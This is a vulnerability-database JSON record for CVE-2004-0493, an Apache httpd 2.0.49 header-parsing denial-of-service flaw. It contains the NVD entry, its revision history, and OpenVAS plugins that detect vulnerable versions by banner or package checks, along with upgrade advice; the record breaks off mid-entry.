{"id": "CVE-2004-0493", "bulletinFamily": "NVD", "title": "CVE-2004-0493", "description": "The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.", "published": "2004-08-06T00:00:00", "modified": "2017-10-10T21:29:26", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0493", "reporter": "NVD", "references": ["http://www.guninski.com/httpd1.html", "http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/023133.html", "http://www.securityfocus.com/bid/10619", "http://www.apacheweek.com/features/security-20", "http://www.mandriva.com/security/advisories?name=MDKSA-2004:064", "http://marc.info/?l=bugtraq&m=108853066800184&w=2", "http://marc.info/?l=bugtraq&m=109181600614477&w=2", "http://security.gentoo.org/glsa/glsa-200407-03.xml", "http://www.trustix.org/errata/2004/0039/", "https://exchange.xforce.ibmcloud.com/vulnerabilities/16524", "http://www.redhat.com/support/errata/RHSA-2004-342.html"], "cvelist": ["CVE-2004-0493"], "type": "cve", "lastseen": "2017-10-11T11:05:56", "history": [{"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:trustix:secure_linux:2.0", "cpe:/a:ibm:http_server:2.0.42.1", "cpe:/h:avaya:s8700:r2.0.0", "cpe:/a:apache:http_server:2.0.49", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:ibm:http_server:2.0.42", "cpe:/h:avaya:s8500:r2.0.0", "cpe:/a:apache:http_server:2.0.48", "cpe:/a:ibm:http_server:2.0.42.2", "cpe:/a:ibm:http_server:2.0.47.1", "cpe:/o:gentoo:linux:1.4", "cpe:/h:avaya:converged_communications_server:2.0", "cpe:/o:trustix:secure_linux:1.5", "cpe:/a:ibm:http_server:2.0.47", "cpe:/h:avaya:s8300:r2.0.0", "cpe:/a:apache:http_server:2.0.47"], "cvelist": ["CVE-2004-0493"], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "description": "The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.", "edition": 1, "hash": "6e17a75004d0e79364b44b0fb3a3c328349ed965ba009352e696a394ab8373af", "hashmap": [{"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "956b0cce3d9454921494ef535bcdf2a4", "key": "cvss"}, {"hash": "90e7b4b62f356e55c5cb3261944139e0", "key": "modified"}, {"hash": "0540f526d5b56f0baa2f693c67e2ffd4", "key": "published"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "cd28e7d7ae3c3f5d9b8d5bc924c1c255", "key": "description"}, {"hash": "2d9e712bec40b9cab21e8e87eeae67b4", "key": "scanner"}, {"hash": "622840d9a17ceeb7962d192c581476b2", "key": "assessment"}, {"hash": "4eedb7a16041634975eeef56ac10ad49", "key": "title"}, {"hash": "1483eedf312795ca8f331fe29c0849f1", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "9e4debc94a85436514d87d507dd0900e", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "0974b4a570ba67b612bc8c7978b0484b", "key": "href"}, {"hash": "bb2b18e62f74ca06ae309002a3bb49b1", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0493", "id": "CVE-2004-0493", "lastseen": "2016-09-03T04:23:38", "modified": "2010-08-21T00:20:38", "objectVersion": "1.2", "published": "2004-08-06T00:00:00", "references": ["http://www.guninski.com/httpd1.html", "http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/023133.html", "http://www.securityfocus.com/bid/10619", "http://marc.theaimsgroup.com/?l=bugtraq&m=108853066800184&w=2", "http://www.apacheweek.com/features/security-20", "http://xforce.iss.net/xforce/xfdb/16524", "http://www.mandriva.com/security/advisories?name=MDKSA-2004:064", "http://security.gentoo.org/glsa/glsa-200407-03.xml", "http://marc.theaimsgroup.com/?l=bugtraq&m=109181600614477&w=2", "http://www.trustix.org/errata/2004/0039/", "http://www.redhat.com/support/errata/RHSA-2004-342.html"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2004-0493", "type": "cve", "viewCount": 1}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T04:23:38"}, {"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:trustix:secure_linux:2.0", "cpe:/a:ibm:http_server:2.0.42.1", "cpe:/h:avaya:s8700:r2.0.0", "cpe:/a:apache:http_server:2.0.49", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:ibm:http_server:2.0.42", "cpe:/h:avaya:s8500:r2.0.0", "cpe:/a:apache:http_server:2.0.48", "cpe:/a:ibm:http_server:2.0.42.2", "cpe:/a:ibm:http_server:2.0.47.1", "cpe:/o:gentoo:linux:1.4", "cpe:/h:avaya:converged_communications_server:2.0", "cpe:/o:trustix:secure_linux:1.5", "cpe:/a:ibm:http_server:2.0.47", "cpe:/h:avaya:s8300:r2.0.0", "cpe:/a:apache:http_server:2.0.47"], "cvelist": ["CVE-2004-0493"], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "description": "The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.", "edition": 3, "enchantments": {}, "hash": "482e1c1a037d4243a90431cfe545a745cf00cfe4f7483dc99d44c1b9d6f6b12e", "hashmap": [{"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "956b0cce3d9454921494ef535bcdf2a4", "key": "cvss"}, {"hash": "0540f526d5b56f0baa2f693c67e2ffd4", "key": "published"}, {"hash": "6277aaef99c297b5130d9367be6629b1", "key": "modified"}, {"hash": "cd28e7d7ae3c3f5d9b8d5bc924c1c255", "key": "description"}, {"hash": "2d9e712bec40b9cab21e8e87eeae67b4", "key": "scanner"}, {"hash": "622840d9a17ceeb7962d192c581476b2", "key": "assessment"}, {"hash": "4eedb7a16041634975eeef56ac10ad49", "key": "title"}, {"hash": "1483eedf312795ca8f331fe29c0849f1", "key": "cvelist"}, {"hash": "3b6b8afbf581482ea55875e912df3561", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "0974b4a570ba67b612bc8c7978b0484b", "key": "href"}, {"hash": "bb2b18e62f74ca06ae309002a3bb49b1", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0493", "id": "CVE-2004-0493", "lastseen": "2017-07-11T11:14:26", "modified": "2017-07-10T21:30:12", "objectVersion": "1.3", "published": "2004-08-06T00:00:00", "references": ["http://www.guninski.com/httpd1.html", "http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/023133.html", "http://www.securityfocus.com/bid/10619", "http://www.apacheweek.com/features/security-20", "http://www.mandriva.com/security/advisories?name=MDKSA-2004:064", "http://marc.info/?l=bugtraq&m=108853066800184&w=2", "http://marc.info/?l=bugtraq&m=109181600614477&w=2", "http://security.gentoo.org/glsa/glsa-200407-03.xml", "http://www.trustix.org/errata/2004/0039/", "https://exchange.xforce.ibmcloud.com/vulnerabilities/16524", "http://www.redhat.com/support/errata/RHSA-2004-342.html"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2004-0493", "type": "cve", "viewCount": 3}, "differentElements": ["assessment", "modified"], "edition": 3, "lastseen": "2017-07-11T11:14:26"}, {"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:trustix:secure_linux:2.0", "cpe:/a:ibm:http_server:2.0.42.1", "cpe:/h:avaya:s8700:r2.0.0", "cpe:/a:apache:http_server:2.0.49", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:ibm:http_server:2.0.42", "cpe:/h:avaya:s8500:r2.0.0", "cpe:/a:apache:http_server:2.0.48", "cpe:/a:ibm:http_server:2.0.42.2", "cpe:/a:ibm:http_server:2.0.47.1", "cpe:/o:gentoo:linux:1.4", "cpe:/h:avaya:converged_communications_server:2.0", "cpe:/o:trustix:secure_linux:1.5", "cpe:/a:ibm:http_server:2.0.47", "cpe:/h:avaya:s8300:r2.0.0", "cpe:/a:apache:http_server:2.0.47"], "cvelist": ["CVE-2004-0493"], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "description": "The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.", "edition": 2, "enchantments": {}, "hash": "7c3e0e21df111547cef4ea469c9b478725473bc9eb259c0b2ee8a514e3c51e33", "hashmap": [{"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "956b0cce3d9454921494ef535bcdf2a4", "key": "cvss"}, {"hash": "0540f526d5b56f0baa2f693c67e2ffd4", "key": "published"}, {"hash": "cd28e7d7ae3c3f5d9b8d5bc924c1c255", "key": "description"}, {"hash": "2d9e712bec40b9cab21e8e87eeae67b4", "key": "scanner"}, {"hash": "622840d9a17ceeb7962d192c581476b2", "key": "assessment"}, {"hash": "4eedb7a16041634975eeef56ac10ad49", "key": "title"}, {"hash": "57ab6b98985ca2a89a2dd9d8fce6f137", "key": "modified"}, {"hash": "1483eedf312795ca8f331fe29c0849f1", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "0974b4a570ba67b612bc8c7978b0484b", "key": "href"}, {"hash": "9a58918c4186a97b239eef687d61fbfa", "key": "references"}, {"hash": "bb2b18e62f74ca06ae309002a3bb49b1", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0493", "id": "CVE-2004-0493", "lastseen": "2017-04-18T15:50:17", "modified": "2016-10-17T22:45:44", "objectVersion": "1.2", "published": "2004-08-06T00:00:00", "references": ["http://www.guninski.com/httpd1.html", "http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/023133.html", "http://www.securityfocus.com/bid/10619", "http://www.apacheweek.com/features/security-20", "http://xforce.iss.net/xforce/xfdb/16524", "http://www.mandriva.com/security/advisories?name=MDKSA-2004:064", "http://marc.info/?l=bugtraq&m=108853066800184&w=2", "http://marc.info/?l=bugtraq&m=109181600614477&w=2", "http://security.gentoo.org/glsa/glsa-200407-03.xml", "http://www.trustix.org/errata/2004/0039/", "http://www.redhat.com/support/errata/RHSA-2004-342.html"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2004-0493", "type": "cve", "viewCount": 2}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-04-18T15:50:17"}], "edition": 4, "hashmap": [{"key": "assessment", "hash": "593bd42eb5a4dac7ad4a035d78307be3"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "bb2b18e62f74ca06ae309002a3bb49b1"}, {"key": "cvelist", "hash": "1483eedf312795ca8f331fe29c0849f1"}, {"key": "cvss", "hash": "956b0cce3d9454921494ef535bcdf2a4"}, {"key": "description", "hash": "cd28e7d7ae3c3f5d9b8d5bc924c1c255"}, {"key": "href", "hash": "0974b4a570ba67b612bc8c7978b0484b"}, {"key": "modified", "hash": "c61e6bb565b4c96b57b332a7218154d8"}, {"key": "published", "hash": "0540f526d5b56f0baa2f693c67e2ffd4"}, {"key": "references", "hash": "3b6b8afbf581482ea55875e912df3561"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "2d9e712bec40b9cab21e8e87eeae67b4"}, {"key": "title", "hash": "4eedb7a16041634975eeef56ac10ad49"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "1a02efc72a7075b6cabf5fd5adab3f15ab83c59d9c39b39ac1773fee14ba87e1", "viewCount": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-10-11T11:05:56"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/o:trustix:secure_linux:2.0", "cpe:/a:ibm:http_server:2.0.42.1", "cpe:/h:avaya:s8700:r2.0.0", "cpe:/a:apache:http_server:2.0.49", "cpe:/o:trustix:secure_linux:2.1", "cpe:/a:ibm:http_server:2.0.42", "cpe:/h:avaya:s8500:r2.0.0", "cpe:/a:apache:http_server:2.0.48", "cpe:/a:ibm:http_server:2.0.42.2", "cpe:/a:ibm:http_server:2.0.47.1", "cpe:/o:gentoo:linux:1.4", "cpe:/h:avaya:converged_communications_server:2.0", "cpe:/o:trustix:secure_linux:1.5", "cpe:/a:ibm:http_server:2.0.47", "cpe:/h:avaya:s8300:r2.0.0", "cpe:/a:apache:http_server:2.0.47"], "assessment": {"href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10605", "name": "oval:org.mitre.oval:def:10605", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}]}

{"result": {"openvas": [{"lastseen": "2018-03-28T17:06:14", "references": ["7269"], "pluginID": "136141256231012293", "description": "The remote host appears to be running a version of Apache 2.x which is\n older than 2.0.50.", "edition": 1, "reporter": "This script is Copyright (C) 2004 David Maciejak", "published": "2005-11-03T00:00:00", "type": "openvas", "title": "Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Denial of Service", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493"], "modified": "2018-03-28T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231012293", "id": "OPENVAS:136141256231012293", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: apache_input_header_folding_dos.nasl 9228 2018-03-28 06:22:51Z cfischer $\n#\n# Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n#ref: Georgi Guninski (June 2004)\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.12293\");\n script_version(\"$Revision: 9228 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-03-28 08:22:51 +0200 (Wed, 28 Mar 2018) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(10619, 12877);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_cve_id(\"CVE-2004-0493\");\n script_xref(name:\"OSVDB\", value:\"7269\");\n script_name(\"Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2004 David Maciejak\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_apache_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache/installed\");\n\n tag_summary = \"The remote host appears to be running a version of Apache 2.x which is\n older than 2.0.50.\";\n\n tag_insight = \"There is denial of service in apache httpd 2.0.x by sending a\n specially crafted HTTP request. It is possible to consume arbitrary\n amount of memory. On 64 bit systems with more than 4GB virtual memory\n this may lead to heap based buffer overflow. See also\n http://www.guninski.com/httpd1.html\n\n There is also a denial of service vulnerability in mod_ssl's\n ssl_io_filter_cleanup function. By sending a request to vulnerable\n server over SSL and closing the connection before the server can send\n a response, an attacker can cause a memory violation that crashes the\n server.\";\n\n tag_solution = \"Upgrade to Apache/2.0.50 or newer\";\n\n script_tag(name:\"summary\", value:tag_summary);\n script_tag(name:\"insight\", value:tag_insight);\n script_tag(name:\"solution\", value:tag_solution);\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port( default:80 );\nbanner = get_http_banner( port:port );\nif( ! banner ) exit( 0 );\n\nif( egrep( pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/2\\.0\\.(([0-9][^0-9])([0-3][0-9][^0-9])|(4[0-9][^0-9])).*\", string:banner ) ) {\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-08T11:44:09", "references": ["7269"], "pluginID": "12293", "description": "The remote host appears to be running a version of Apache 2.x which is\nolder than 2.0.50. \n\nThere is denial of service in apache httpd 2.0.x by sending a\nspecially crafted HTTP request. It is possible to consume arbitrary\namount of memory. On 64 bit systems with more than 4GB virtual memory\nthis may lead to heap based buffer overflow. See also\nhttp://www.guninski.com/httpd1.html\n\nThere is also a denial of service vulnerability in mod_ssl's\nssl_io_filter_cleanup function. By sending a request to vulnerable\nserver over SSL and closing the connection before the server can send\na response, an attacker can cause a memory violation that crashes the\nserver.", "edition": 2, "reporter": "This script is Copyright (C) 2004 David Maciejak", "published": "2005-11-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities", "type": "openvas", "naslFamily": "Denial of Service", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493"], "modified": "2017-12-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=12293", "id": "OPENVAS:12293", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: apache_input_header_folding_dos.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote host appears to be running a version of Apache 2.x which is\nolder than 2.0.50. \n\nThere is denial of service in apache httpd 2.0.x by sending a\nspecially crafted HTTP request. It is possible to consume arbitrary\namount of memory. On 64 bit systems with more than 4GB virtual memory\nthis may lead to heap based buffer overflow. See also\nhttp://www.guninski.com/httpd1.html\n\nThere is also a denial of service vulnerability in mod_ssl's\nssl_io_filter_cleanup function. By sending a request to vulnerable\nserver over SSL and closing the connection before the server can send\na response, an attacker can cause a memory violation that crashes the\nserver.\";\n\ntag_solution = \"Upgrade to Apache/2.0.50 or newer\";\n\n#ref: Georgi Guninski (June 2004)\n\nif(description)\n{\n script_id(12293);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(10619, 12877);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_cve_id(\"CVE-2004-0493\");\n script_xref(name:\"OSVDB\", value:\"7269\");\n \n name = \"Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities\";\n\n script_name(name);\n \n\n \n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n \n \n script_copyright(\"This script is Copyright (C) 2004 David Maciejak\");\n family = \"Denial of Service\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_keys(\"www/apache\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nif(get_port_state(port))\n{\nbanner = get_http_banner(port: port);\nif(!banner)exit(0);\n \nif(egrep(pattern:\"^Server:.*Apache(-AdvancedExtranetServer)?/2\\.0\\.(([0-9][^0-9])([0-3][0-9][^0-9])|(4[0-9][^0-9])).*\", string:banner))\n {\n security_message(port);\n }\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:57", "references": [], "pluginID": "54610", "description": "The remote host is missing updates announced in\nadvisory GLSA 200407-03.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Gentoo Security Advisory GLSA 200407-03 (Apache)", "type": "openvas", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=54610", "id": "OPENVAS:54610", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A bug in Apache may allow a remote attacker to perform a Denial of Service\nattack. With certain configurations this could lead to a heap based buffer\noverflow.\";\ntag_solution = \"Apache 2 users should upgrade to the latest version of Apache:\n\n # emerge sync\n\n # emerge -pv '>=net-www/apache-2.0.49-r4'\n # emerge '>=net-www/apache-2.0.49-r4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200407-03\nhttp://bugs.gentoo.org/show_bug.cgi?id=55441\nhttp://www.guninski.com/httpd1.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200407-03.\";\n\n \n\nif(description)\n{\n script_id(54610);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(10619);\n script_cve_id(\"CVE-2004-0493\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200407-03 (Apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/apache\", unaffected: make_list(\"ge 2.0.49-r4\", \"lt 2\"), vulnerable: make_list(\"le 2.0.49-r3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:40:13", "references": ["http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00915716-1", "01064"], "pluginID": "1361412562310835148", "description": "Check for the Version of Apache", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-05-05T00:00:00", "title": "HP-UX Update for Apache HPSBUX01064", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0493", "CVE-2004-0595", "CVE-2004-0488", "CVE-2004-0594"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835148", "id": "OPENVAS:1361412562310835148", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache HPSBUX01064\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote execution of arbitrary code\n Denial of Service (DoS)\";\ntag_affected = \"Apache on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server.\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n Apache. The vulnerability could be exploited remotely to allow execution of \n arbitrary code or to create a Denial of Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c00915716-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835148\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", 